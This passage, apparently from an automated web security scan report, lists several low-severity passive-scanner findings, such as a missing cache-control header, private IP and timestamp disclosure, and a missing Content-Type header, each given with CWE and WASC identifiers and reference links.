    Source raised by a passive scanner (Incomplete or No Cache-control Header Set)
    CWE ID 525
    WASC ID 13
    Reference
    1. https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html#web-content-caching
    2. https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control
  6. Private IP Disclosure

    Source raised by a passive scanner (Private IP Disclosure)
    CWE ID 200
    WASC ID 13
    Reference
    1. https://tools.ietf.org/html/rfc1918
  7. Timestamp Disclosure - Unix

    Source raised by a passive scanner (Timestamp Disclosure)
    CWE ID 200
    WASC ID 13
    Reference
    1. http://projects.webappsec.org/w/page/13246936/Information%20Leakage
  8. Content-Type Header Missing

    Source raised by a passive scanner (Content-Type Header Missing)
    CWE ID 345
    WASC ID 12
    Reference
    1. http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx
  9. Information Disclosure - Suspicious Comments

    Source raised by a passive scanner (Information Disclosure - Suspicious Comments)
    CWE ID 200
    WASC ID 13